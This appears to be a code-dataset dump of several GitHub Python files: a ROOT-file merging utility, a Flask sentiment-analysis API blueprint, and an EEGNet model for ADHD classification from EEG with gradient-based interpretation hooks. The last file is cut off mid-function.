"line_number": 385, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 391, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 395, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 396, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 436, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 442, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 460, "usage_type": "call"}, 
{"api_name": "utils.helper.Helper", "line_number": 464, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 468, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 473, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 482, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 487, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 488, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 490, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 491, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 498, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 510, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 514, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 515, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 537, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 548, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 549, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 559, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 560, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 564, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 568, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 569, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 590, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 602, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 606, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 608, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 609, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 613, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 614, "usage_type": "call"}]}
+{"seq_id": "20276586436", "text": "from __future__ import print_function\n\nimport os\nfrom builtins import input\nfrom builtins import map\nfrom functools import partial\nfrom multiprocessing import Pool\n\nfrom PyAnalysisTools.base.ShellUtils import move, remove_directory, make_dirs\n\n\ndef parallel_merge(data, output_path, prefix, merge_dir=None, force=False, postfix=None, ncpu=10):\n make_dirs(output_path)\n make_dirs(merge_dir)\n if merge_dir is None:\n merge_dir = output_path\n if len(os.listdir(merge_dir)) > 0:\n do_delete = input(\"Merge directory contains already files. Shall I delete those?: [y|n]\")\n if do_delete.lower() == \"y\" or do_delete.lower() == \"yes\":\n list([remove_directory(os.path.join(merge_dir, d)) for d in os.listdir(merge_dir)])\n\n pool = Pool(processes=min(ncpu, len(data)))\n pool.map(partial(parallel_merge_wrapper, output_path=output_path, prefix=prefix,\n merge_dir=merge_dir, force=force, postfix=postfix), data.items())\n\n\ndef parallel_merge_wrapper(dict_element, output_path, prefix, merge_dir=None, force=False, postfix=None):\n process, input_file_list = dict_element\n if merge_dir is not None:\n merge_dir = os.path.join(merge_dir, process)\n merge_files(input_file_list, output_path, prefix + \"{:s}\".format(process), merge_dir, force, postfix)\n\n\ndef merge_files(input_file_list, output_path, prefix, merge_dir=None, force=False, postfix=None):\n def build_buckets(file_list):\n limit = 2. * 1024. * 1024. * 1024.\n if sum(map(os.path.getsize, file_list)) < limit:\n return [file_list]\n bucket_list = []\n tmp = []\n summed_file_size = 0.\n for file_name in file_list:\n if summed_file_size > limit:\n summed_file_size = 0.\n bucket_list.append(tmp)\n tmp = []\n summed_file_size += os.path.getsize(file_name)\n tmp.append(file_name)\n bucket_list.append(tmp)\n return bucket_list\n\n def merge(file_lists):\n import time\n time.sleep(2)\n if len([f for chunk in file_lists for f in chunk]) == 0:\n return\n for file_list in file_lists:\n merge_cmd = 'nice -n 15 hadd '\n if force:\n merge_cmd += ' -f '\n if postfix is not None:\n output_file_name = '{:s}_{:d}.{:s}.root'.format(prefix, file_lists.index(file_list), postfix)\n else:\n output_file_name = '{:s}_{:d}.root'.format(prefix, file_lists.index(file_list))\n merge_cmd += '%s %s' % (output_file_name, ' '.join(file_list))\n if not force and os.path.exists(os.path.join(output_path, output_file_name)):\n continue\n os.system(merge_cmd)\n if not merge_dir == output_path:\n move(output_file_name, os.path.join(output_path, output_file_name))\n\n def setup_paths(merge_dir):\n if not os.path.exists(output_path):\n make_dirs(output_path)\n if merge_dir is None:\n merge_dir = output_path\n else:\n merge_dir = os.path.abspath(merge_dir)\n make_dirs(merge_dir)\n os.chdir(merge_dir)\n\n buckets = build_buckets(input_file_list)\n setup_paths(merge_dir)\n merge(buckets)\n if merge_dir is not None:\n remove_directory(os.path.abspath(merge_dir))\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/base/IOTools.py", "file_name": "IOTools.py", "file_ext": "py", "file_size_in_byte": 3368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 13, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "builtins.input", 
"line_number": 18, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 22, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "builtins.map", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.system", "line_number": 68, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.move", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 79, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 80, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}]}
+{"seq_id": "23209181395", "text": "from flask import Blueprint, request, jsonify\n\nfrom logging_setup.logger import ApiLogger\nfrom ..application.application_api import app_token_required\nfrom .sentiment_handlers import add_new_sentiment as sh\nfrom .models.UserOverallSentiments import UserOverallSentiments\nfrom .models.UserInteractionSentiment import UserInteractionSentiment\n\nsentiment_bp = Blueprint(\n \"sentiment_api\", \n __name__,\n url_prefix='/sentiment',\n template_folder='templates/sentiment')\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef get_user_sentiment(userid, contentid):\n flow_id = \"get_user_sentiments\".upper()\n try:\n contentid = request.args.get('contentid', default=None, type=str)\n towardsuserid = request.args.get(\n 'towardsuserid', default=None, type=str)\n\n ApiLogger.log_debug(flow_id, \"Fetching overall sentiments for \",\n f\"User_sentiment - parameters userid: {userid} contentid: {contentid}\")\n if contentid == None:\n return jsonify(UserOverallSentiments.get_user_sentiment(userid))\n\n return jsonify(UserInteractionSentiment.get_user_sentiment_for_content(userid, contentid, towardsuserid))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef set_user_sentiment():\n try:\n flow_id = \"set_user_sentiments\".upper()\n req = request\n ApiLogger.log_debug(flow_id, \"Api Begin\",\n f\"set user sentiments - {request.json}\")\n return jsonify(sh.set_user_sentiment(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/check\", methods=['POST'])\ndef analyze_sentiment():\n try:\n flow_id = \"Analyze_sentiment\".upper()\n ApiLogger.log_debug(flow_id, \"Api Begin\", f\"{request.json}\")\n\n return jsonify(sh.get_sentiments_of_content(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n", "repo_name": "Pbasnal/flask-twitterclone", "sub_path": "api/blueprints/sentiment/sentiment_api.py", "file_name": "sentiment_api.py", "file_ext": "py", "file_size_in_byte": 2109, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 24, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments.get_user_sentiment", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 29, "usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment.get_user_sentiment_for_content", "line_number": 29, 
"usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment", "line_number": 29, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 31, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 31, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 40, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.set_user_sentiment", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 44, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 44, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 34, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 52, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.get_sentiments_of_content", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 56, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 56, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "13874924436", "text": "import torch\nimport scipy.io as sio\nimport numpy as np\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport mne\n\nfrom scipy.integrate import simps\nfrom mne.time_frequency import psd_array_multitaper\n\nfrom torch.optim.lr_scheduler import StepLR, ReduceLROnPlateau\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.autograd import Variable\nfrom torch.utils.tensorboard import SummaryWriter\nfrom matplotlib.collections import LineCollection\nimport matplotlib.gridspec as gridspec\nfrom adhd_classification import data_load\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, precision_score, recall_score, accuracy_score,confusion_matrix,roc_curve,f1_score\n\nfrom electrodes_positions import get_electrodes_coordinates, set_electrodes_montage, get_electrodes_positions\nfrom early_stopping import EarlyStopping\nPATH_DATASET_MAT= r\"C:\\Users\\Ahmed Guebsi\\Downloads\\ADHD_part1\"\n\n\ntorch.cuda.empty_cache()\ntorch.manual_seed(0)\nnp.random.seed(0)\nplt.rcParams.update({'font.size': 14})\n\n\nclass EEGNet(torch.nn.Module):\n def __init__(self, channelnum=19):\n super(EEGNet, self).__init__()\n\n # model parameters\n self.eps = 1e-05\n\n self.f1 = 8\n self.d = 2\n self.conv1 = torch.nn.Conv2d(1, self.f1, (1, 64), padding=(0, 32), bias=False)\n self.batchnorm1 = torch.nn.BatchNorm2d(self.f1, track_running_stats=False)\n self.batchnorm2 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.batchnorm3 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.activ1 = torch.nn.ELU()\n self.activ2 = torch.nn.ELU()\n self.depthconv = torch.nn.Conv2d(self.f1, self.f1 * self.d, (19, 1), groups=self.f1, bias=False)\n self.avgpool = torch.nn.AvgPool2d((1, 4))\n self.separable = torch.nn.Conv2d(self.f1 * self.d, self.f1 * self.d, (1, 16), padding=(0, 8),\n groups=self.f1 * self.d, bias=False)\n self.fc1 = torch.nn.Linear(256, 2) # 128\n self.softmax = nn.LogSoftmax(dim=1)\n self.softmax1 = nn.Softmax(dim=1)\n self.dropout = nn.Dropout(p=0.5)\n\n # parameters for the interpretation techniques\n self.batch_mean1 = 0\n self.batch_std1 = 0\n self.gamma1 = 0\n self.beta1 = 0\n self.batch_mean2 = 0\n self.batch_std2 = 0\n self.gamma2 = 0\n self.beta2 = 0\n self.batch_mean3 = 0\n self.batch_std3 = 0\n self.gamma3 = 0\n self.beta3 = 0\n self.activ_in1 = 0\n self.activ_out1 = 0\n self.activ_baseline_in1 = 0\n self.activ_baseline_out1 = 0\n self.activ_in2 = 0\n self.activ_out2 = 0\n self.activ_baseline_in2 = 0\n self.activ_baseline_out2 = 0\n\n def forward(self, inputdata):\n intermediate = self.conv1(inputdata)\n\n intermediate = self.batchnorm1(intermediate)\n\n intermediate = self.depthconv(intermediate)\n\n intermediate = self.batchnorm2(intermediate)\n\n intermediate = self.activ1(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 4))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = self.separable(intermediate)\n\n intermediate = self.batchnorm3(intermediate)\n\n intermediate = self.activ2(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 8))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = intermediate.view(intermediate.size()[0], -1)\n\n intermediate = self.fc1(intermediate)\n\n output = self.softmax(intermediate)\n print(output.shape)\n print(output)\n\n return output\n\n def update_softmax_forward(self):\n def 
softmax_forward_hook_function(module, ten_in, ten_out):\n return ten_in[0]\n\n handle = self.softmax.register_forward_hook(softmax_forward_hook_function)\n\n return handle\n\n # make the batch normalization layer a linear operation before applying backpropagation to remove the effects of other samples in the batch\n\n def update_batch_forward(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean1 = self.batch_mean1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd1 = self.batch_std1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean1), batchstd1)\n gammamatrix = (self.gamma1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean2 = self.batch_mean2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd2 = self.batch_std2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean2), batchstd2)\n gammamatrix = (self.gamma2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean3 = self.batch_mean3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd3 = self.batch_std3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean3), batchstd3)\n gammamatrix = (self.gamma3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n # Save the batch mean and std\n\n def update_batch_forward_meanstd(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean1 = torch.mean(data, [0, 2, 3], True)\n self.batch_std1 = torch.sqrt(torch.mean((data - self.batch_mean1) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma1[0, :, 0, 0] = self.batchnorm1.weight.clone().detach().requires_grad_(False).cpu()\n self.beta1[0, :, 0, 0] = self.batchnorm1.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean2 = torch.mean(data, [0, 2, 3], True)\n self.batch_std2 = torch.sqrt(torch.mean((data - 
self.batch_mean2) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma2[0, :, 0, 0] = self.batchnorm2.weight.clone().detach().requires_grad_(False).cpu()\n self.beta2[0, :, 0, 0] = self.batchnorm2.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean3 = torch.mean(data, [0, 2, 3], True)\n self.batch_std3 = torch.sqrt(torch.mean((data - self.batch_mean3) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma3[0, :, 0, 0] = self.batchnorm3.weight.clone().detach().requires_grad_(False).cpu()\n self.beta3[0, :, 0, 0] = self.batchnorm3.bias.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n def update_activ_forward(self):\n def activ_forward_hook_function1(module, ten_in, ten_out):\n self.activ_in1 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out1 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n def activ_forward_hook_function2(module, ten_in, ten_out):\n self.activ_in2 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out2 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.activ1.register_forward_hook(activ_forward_hook_function1)\n handle2 = self.activ2.register_forward_hook(activ_forward_hook_function2)\n #\n return [handle1, handle2]\n\n\n def update_activ_deconvolution(self):\n def activ_backward_hook_function(mmodule, grad_in, grad_out):\n modified_grad = torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function)\n return [handle1, handle2]\n\n def update_activ_guidedbackpropogation(self):\n def activ_backward_hook_function1(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out1 > 0, torch.ones_like(self.activ_out1),torch.zeros_like(self.activ_out1))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n def activ_backward_hook_function2(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out2 > 0, torch.ones_like(self.activ_out2),torch.zeros_like(self.activ_out2))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function1)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function2)\n return [handle1, handle2]\n\n\nclass VisTech():\n def __init__(self, model):\n self.model = model\n self.model.eval()\n\n self.eps = 0.000001\n self.method = None\n\n def enhanceheatmap(self, heatmap, r=5):\n\n sampleChannel = heatmap.shape[0]\n sampleLength = heatmap.shape[1]\n\n newmap = np.zeros((sampleChannel, sampleLength))\n for i in range(sampleChannel):\n for j in range(sampleLength):\n if j < r:\n newmap[i, j] = np.mean(heatmap[i, :j + r])\n elif j + r > sampleLength:\n newmap[i, j] = 
np.mean(heatmap[i, j - r:])\n else:\n newmap[i, j] = np.mean(heatmap[i, j - r:j + r])\n\n return newmap\n\n def convert_batchlayer_to_linear(self, batchInput):\n\n handles = self.model.update_batch_forward_meanstd()\n self.model(batchInput)\n self.remove_registered_functions(handles)\n handles = self.model.update_batch_forward()\n\n return handles\n\n def remove_registered_functions(self, handles):\n for handle in handles:\n handle.remove()\n\n def heatmap_calculation_backpropogation(self, batchInput, sampleidx, method='EpsilonLRP'):\n # This function outputs the heatmaps generated with different interpretation techniques.\n # Most of the techniques can be achieved by modifying the nonlinear activation layers\n\n def calculate_one_hot_out_put(output):\n result = output.cpu().detach().numpy()\n preds = result.argmax(axis=-1)\n one_hot_output = np.zeros(result.shape)\n\n for i in range(preds.shape[0]):\n one_hot_output[i, preds[i]] = 1\n\n one_hot_output = torch.DoubleTensor(one_hot_output)\n\n return one_hot_output\n\n sampleInput = batchInput\n sampleInput.requires_grad = True\n\n handles0 = self.convert_batchlayer_to_linear(batchInput)\n\n if method == \"guidedbackpropogation\":\n handles1 = self.model.update_activ_forward()\n handles2 = self.model.update_activ_guidedbackpropogation()\n\n output = self.model(sampleInput)\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n self.remove_registered_functions(handles1 + handles2)\n\n\n elif method == \"Saliencymap\":\n output = self.model(sampleInput)\n\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n\n self.remove_registered_functions(handles0)\n # the methods generate heatmaps for a whole batch; with a sample index, return that sample's heatmap\n if sampleidx is not None:\n heatmap = heatmap[sampleidx]\n\n return heatmap\n\n\n def generate_interpretation(self, batchInput, sampleidx, subid, samplelabel, likelihood, method):\n\n if likelihood[0] > likelihood[1]: # likelihood of the sample being classified as normal vs adhd\n state = 0\n else:\n state = 1\n\n if samplelabel == 0:\n labelstr = 'normal'\n else:\n labelstr = 'adhd'\n\n sampleInput = batchInput[sampleidx].cpu().detach().numpy().squeeze()\n sampleChannel = sampleInput.shape[0]\n sampleLength = sampleInput.shape[1]\n\n # occipital channels are O1/O2 (letter O, not zero), as expected by the standard_1020 montage\n channelnames =['Fp1', 'Fp2', 'F7', 'F3', 'Fz', 'F4', 'F8', 'T7', 'C3', 'Cz', 'C4', 'T8','P7', 'P3', 'Pz', 'P4', 'P8', 'O1', 'O2']\n\n\n heatmap_sample_thres = 2\n heatmap_channel_thres = 1\n\n # generate the original sample and channel contribution maps\n heatmap = self.heatmap_calculation_backpropogation(batchInput=batchInput, sampleidx=sampleidx, method=method)\n heatmap_channel = np.mean(heatmap, axis=1)\n\n\n # Step 1: normalization\n heatmap = (heatmap - np.mean(heatmap)) / (np.std(heatmap))\n heatmap_channel = (heatmap_channel - np.mean(heatmap_channel)) / (np.std(heatmap_channel))\n\n # Step 2: thresholding\n heatmap_channel = heatmap_channel - heatmap_channel_thres\n heatmap = heatmap - heatmap_sample_thres\n\n # set values below lower bound of color map -1 to -1\n for u in range(sampleChannel):\n for l in range(sampleLength):\n if heatmap[u, l] < -1:\n heatmap[u, l] = -1\n # Step 3: smoothing\n smooth_factor = 5\n heatmap = self.enhanceheatmap(heatmap, smooth_factor)\n\n\n\n # draw the figure\n rowdivide = 4\n fig = 
plt.figure(figsize=(15, 9))\n gridlayout = gridspec.GridSpec(ncols=2, nrows=rowdivide, figure=fig, wspace=0.05, hspace=0.3)\n axs0 = fig.add_subplot(gridlayout[0:rowdivide - 1, 0])\n axs1 = fig.add_subplot(gridlayout[0:rowdivide - 1, 1])\n axs2 = fig.add_subplot(gridlayout[rowdivide - 1, :])\n\n axs2.xaxis.set_ticks([])\n axs2.yaxis.set_ticks([])\n\n # display the results\n axs2.text(0.01, 0.8, 'Model: EEGNET Interpretation: ' + method ,horizontalalignment='left', fontsize=15)\n fig.suptitle('Subject:' + str(int(subid)) + ' ' + 'Label:' + labelstr + ' ' + '$P_{normal}=$' + str(\n round(likelihood[0], 2)) + ' $P_{adhd}=$' + str(round(likelihood[1], 2)), y=0.985, fontsize=17)\n\n\n thespan = np.percentile(sampleInput, 98)\n xx = np.arange(1, sampleLength + 1)\n\n for i in range(0, sampleChannel):\n y = sampleInput[i, :] + thespan * (sampleChannel - 1 - i)\n dydx = heatmap[i, :]\n\n points = np.array([xx, y]).T.reshape(-1, 1, 2)\n segments = np.concatenate([points[:-1], points[1:]], axis=1)\n norm = plt.Normalize(-1, 1)\n lc = LineCollection(segments, cmap='viridis', norm=norm)\n lc.set_array(dydx)\n lc.set_linewidth(2)\n axs0.add_collection(lc)\n\n yttics = np.zeros(sampleChannel)\n for gi in range(sampleChannel):\n yttics[gi] = gi * thespan\n\n axs0.set_ylim([-thespan, thespan * sampleChannel])\n axs0.set_xlim([0, sampleLength + 1])\n axs0.set_xticks([1, 128, 256, 384,512])\n axs0.set_xticklabels(['0', '1', '2','3', '4(s)'])\n\n inversechannelnames = []\n for i in range(sampleChannel):\n inversechannelnames.append(channelnames[sampleChannel - 1 - i])\n\n plt.sca(axs0)\n plt.yticks(yttics, inversechannelnames)\n\n montage = 'standard_1020'\n sfreq = 128\n\n info = mne.create_info(\n channelnames,\n ch_types=['eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg'],\n sfreq=sfreq\n )\n\n electrodes_coordinates = get_electrodes_coordinates(channelnames)\n # print(electrodes_coordinates)\n dig_points = get_electrodes_positions(channelnames, electrodes_coordinates)\n _,info = set_electrodes_montage(channelnames, electrodes_coordinates,sampleInput)\n\n im, cn = mne.viz.plot_topomap(data=heatmap_channel, 